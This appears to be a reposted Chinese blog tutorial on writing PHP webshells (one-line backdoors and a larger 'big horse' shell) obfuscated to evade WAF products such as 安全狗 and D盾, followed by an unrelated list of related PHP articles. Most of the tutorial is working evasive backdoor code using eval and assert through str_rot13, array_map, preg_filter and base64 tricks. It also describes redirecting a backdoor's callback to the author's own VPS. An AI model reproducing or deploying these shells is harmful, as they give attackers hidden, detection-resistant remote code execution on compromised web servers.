php webshell 小马,php webshell免杀

2024-03-01 10:20
文章标签 php 免杀 webshell 小马

本文主要是介绍php webshell 小马,php webshell免杀,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言

最近在研究php免杀绕过安全狗、D盾等WAF防护软件。也算是小有成绩。故记录下来。

一句话木马

在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。

最常见的php一句话木马

这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。

本着这个原则,尝试改写一句话木马绕过WAF。

搜集了几个常用的php函数

执行代码的eval、assert、preg_replace

接收数据的$_POST、$_GET、$_REQUEST

php一句话免杀

str_rot13函数

$c=str_rot13('nffreg');

$c($_REQUEST['x']);

?>

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

测试发现无法绕过安全狗。修改一下。

function xiaoma($a){

$c=str_rot13('nffreg');

$c($a);

}

xiaoma($_REQUEST['x']);

?>

即可绕过安全狗。

class One{

function xiaoma($x){

$c=str_rot13('n!ff!re!nffreg');

$str=explode('!',$c)[3];

$str($x);

}

}

$test=new One();

$test->xiaoma($_REQUEST['x']);

?>

再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。

array_map函数

array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。

$a1=array("1234","123456");

$a2=array(@$_REQUEST['x'],"1234");

$a=array_map(null,$a1,$a2)[0][1];

assert($a);

?>

即可绕过安全狗。

array_key函数

array_key() 函数也是返回包含数组的一个新数组。

$a=array($_REQUEST['x']=>"3");

$b=array_keys($a)[0];

eval($b);

?>

索引数组变化为关联数组。

即可绕过安全狗、D盾。

preg_replace函数

用来正则匹配的一个函数。

function func(){

return $_REQUEST['x'];

}

preg_replace("/test/e",func(),"i am test");

?>

/e用来当做php代码解析。5.6版本以下实用。

测试可绕过安全狗和D盾。

preg_filter函数

根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。

$a=preg_filter('/\s+/','','as s er t');

$a($_REQUEST['x']);

?>

也可以绕过D盾、安全狗。

其他

function test($a){

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func.=$func.$arr[$i];

}

$func=substr($func,-6);

$func($a);

}

test($_REQUEST['x']);

?>

也可以绕过D盾、安全狗。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

php免杀大马

正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。

将大马eval函数变为exit或者echo。burp抓取源代码。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

将源代码拷贝下来,审计发现给源码存在一处后门。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

base64解码一下

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

哦!!!真是可以。

将该base64地址修改为自己的vps地址。嘻嘻。

那现在只要eval函数可以执行这传base64的字符串就可以啦。

WAF对base64_encode、base64_decode查杀非常严格。

不断搜索、修改、编写,最终成功。

header("Content-type: text/html; charset=utf-8");

class one{

public function dama(){

$l='base';

$o='64_de';

$v='co';

$e='de';

$love=$l.$o.$v.$e;

$c="love";

$shellname='网站安全检测';

$password='xxx';

$myurl='http://www.xxx.com';

$a=$$c('code');//php源码

@eval($a);

}

}

$person = new one;

$person->dama();

?>

直接将php大马源码放在code处。即可。

也可以改造php免杀一句话木马。

比如这款

header("Content-type: text/html; charset=utf-8");

function test($code){

$password='xxx';

$a=preg_filter('/\s+/','','base 64 _ deco de');

$c=$a($code);

@eval($c);

}

$code=''; //code存放php大马

test($code);

?>

访问一下。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

查看vps是否接收到。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

这篇关于php webshell 小马,php webshell免杀的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/762107

相关文章

PHP执行php.exe -v命令报错的解决方案

《PHP执行php.exe-v命令报错的解决方案》:本文主要介绍PHP执行php.exe-v命令报错的解决方案,文中通过图文讲解的非常详细,对大家的学习或工作有一定的帮助,需要的朋友可以参考下... 目录执行phpandroid.exe -v命令报错解决方案执行php.exe -v命令报错-PHP War

PHP原理之内存管理中难懂的几个点

PHP的内存管理, 分为俩大部分, 第一部分是PHP自身的内存管理, 这部分主要的内容就是引用计数, 写时复制, 等等面向应用的层面的管理. 而第二部分就是今天我要介绍的, zend_alloc中描写的关于PHP自身的内存管理, 包括它是如何管理可用内存, 如何分配内存等. 另外, 为什么要写这个呢, 因为之前并没有任何资料来介绍PHP内存管理中使用的策略, 数据结构, 或者算法. 而在我们

php中json_decode()和json_encode()

1.json_decode() json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json

如何将文件夹里的PHP代码放到一个文件里

find ./dir -name "*.php" -exec 'cat' {} \; > dir.out

PHP抓取网站图片脚本

方法一: <?phpheader("Content-type:image/jpeg"); class download_image{function read_url($str) { $file=fopen($str,"r");$result = ''; while(!feof($file)) { $result.=fgets($file,9999); } fclose($file); re

PHP防止SQL注入详解及防范

SQL 注入是PHP应用中最常见的漏洞之一。事实上令人惊奇的是,开发者要同时犯两个错误才会引发一个SQL注入漏洞。 一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。这两个重要的步骤缺一不可,需要同时加以特别关注以减少程序错误。 对于攻击者来说,进行SQL注入攻击需要思考和试验,对数据库方案进行有根有据的推理非常有必要(当然假设攻击者看不到你的

PHP防止SQL注入的方法(2)

如果用户输入的是直接插入到一个SQL语句中的查询,应用程序会很容易受到SQL注入,例如下面的例子: $unsafe_variable = $_POST['user_input'];mysql_query("INSERT INTO table (column) VALUES ('" . $unsafe_variable . "')"); 这是因为用户可以输入类似VALUE”); DROP TA

PHP防止SQL注入的方法(1)

(1)mysql_real_escape_string – 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = "select count(*) as ctr from users where username ='".mysql_real_escape_string($username)."' and password='". mysql_r

Linux系统安装php开发环境

Linux系统centos6.5 PHP5.6 MySQL5.6 Nginx1.7 yum安装依赖库 yum install -y make cmake gcc gcc-c++ autoconf automake libpng-devel libjpeg-devel zlib libxml2-devel ncurses-devel bison \libtool-ltdl-devel li

PHP字符串全排列

方法一: $str = 'abc';$a =str_split($str);perm($a, 0, count($a)-1);function perm(&$ar, $k, $m) {if($k == $m){ echo join('',$ar), PHP_EOL;}else {for($i=$k; $i<=$m; $i++) {swap($ar[$k], $ar[$i]);perm($ar